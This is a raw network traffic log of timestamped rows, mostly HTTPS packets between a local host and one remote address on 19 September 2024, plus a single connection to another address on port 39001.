Sep 19, 2024 02:41:43.263497114 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.263631105 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.263855934 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.263870955 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.264034033 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.264151096 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.264733076 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.272449017 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.272649050 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.272753000 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.273499966 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.273665905 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.273679018 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.273794889 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.273801088 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.273885965 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.284923077 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.284940004 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.285068035 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.285080910 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.285170078 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.285260916 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.291783094 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.291821003 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.291973114 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.291984081 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.292073011 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.303725004 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.303766012 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.303891897 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.303904057 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.304007053 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.304071903 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.311657906 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.311680079 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.311829090 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.311944008 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.311952114 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.312001944 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.318404913 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.318428040 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.318598986 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.318612099 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.318708897 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.318758965 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.322293043 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.322309971 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.322443008 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.322571993 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.322578907 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.322637081 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.328119993 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.328139067 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.328298092 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.328310966 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.328418016 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.328459978 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.337703943 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.337723017 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.337903976 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.338033915 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.338046074 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.342221975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.342238903 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.342391968 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.342403889 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.342499018 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.342577934 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.347940922 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.347958088 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.348083973 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.348184109 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.348191977 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.348273039 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.353755951 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.353777885 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.353929996 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.353944063 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.354051113 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.354120016 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.368088961 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.368105888 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.368279934 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.368382931 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.368391037 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.368422985 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.369935036 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.369954109 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.370168924 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.370186090 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.370256901 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.371567011 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.371582985 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.371706963 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.371718884 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.371783972 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.371901035 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.379318953 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.379363060 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.379488945 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.379604101 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.379611015 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.379668951 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.381953001 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.381987095 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.382134914 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.382148027 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.382236004 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.382325888 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.386581898 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.386605024 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.386800051 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.386877060 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.386888981 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.387001991 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.391486883 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.391504049 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.391643047 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.391657114 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.391726971 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.391838074 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.397917986 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.397944927 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.398092031 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.398207903 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.398220062 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.398289919 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.400877953 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.400902987 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.401056051 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.401068926 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.401145935 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.401237011 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.404886961 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.404923916 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.405098915 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.405109882 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.405234098 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.407627106 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.407661915 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.407753944 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.407766104 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.407836914 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.407943964 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.411874056 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.411896944 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.412022114 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.412092924 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.412100077 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.412220955 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.414083958 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.414107084 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.414237976 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.414248943 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.414289951 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.414417982 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.422461033 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.422478914 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.422610998 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.422725916 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.422734022 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.422791004 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.423686028 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.423722982 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.423852921 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.423862934 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.423974037 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.426498890 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.426522017 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.426665068 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.426692009 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.426743984 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.426841974 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.427522898 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.427546978 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.427680969 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.427795887 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.427808046 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.427860022 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.429363966 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.429378986 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.429512978 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.429522991 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.429603100 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.429706097 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.432478905 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.432493925 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.432658911 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.432760954 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.432768106 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.436610937 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.436630011 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.436791897 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.436820030 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.436844110 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.436974049 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.437987089 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.438015938 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.438132048 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.438247919 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.438255072 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.438325882 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.440082073 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:43.442195892 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.442224026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.442399025 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.442410946 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.442435980 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.442512035 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.443660975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.443679094 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.443831921 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.443948030 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.443955898 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.444020033 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.447849035 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.447865963 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.448039055 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.448052883 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.448141098 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.448999882 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.449021101 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.449142933 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.449152946 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.449233055 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.449323893 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.451473951 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.451498985 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.451626062 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.451741934 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.451747894 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.451819897 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.454015017 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.454037905 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.454148054 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.454158068 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.454237938 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.454292059 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.457742929 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.457768917 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.457906008 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.458046913 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.458054066 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.460236073 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.460261106 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.460388899 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.460401058 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.460464954 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.460568905 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.463392019 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.463408947 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.463619947 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.463736057 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.463747978 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.465073109 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.465090036 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.465290070 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.465301991 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.465393066 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.470909119 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.470927954 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.471062899 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.471080065 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.471168995 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.471255064 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.473339081 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.473355055 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.473522902 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.473640919 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.473653078 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.475568056 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.475584030 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.475792885 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.475805044 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.475903988 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.476531029 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.476551056 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.476703882 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.476716042 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.476783991 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.476912022 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.477998018 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.478010893 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.478185892 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.478316069 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.478327990 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.482731104 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.482750893 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.482913017 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.482939959 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.483000040 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.483087063 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.484841108 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.484865904 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.485011101 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.485023975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.485115051 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.485192060 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.486063004 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.486076117 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.486244917 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.486337900 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.486350060 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.486438036 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.487602949 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.487622976 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.487754107 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.487770081 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.487857103 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.487972975 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.489486933 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.489510059 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.489665985 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.489794016 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.489808083 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.491854906 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.491882086 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.492096901 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.492114067 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.492224932 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.496531010 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.496551991 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.496622086 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.496723890 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.496740103 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.496840000 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.497009039 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.497204065 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.498291969 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.498312950 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.498477936 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.498698950 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.498707056 CEST	443	49842	172.67.143.156	192.168.11.30
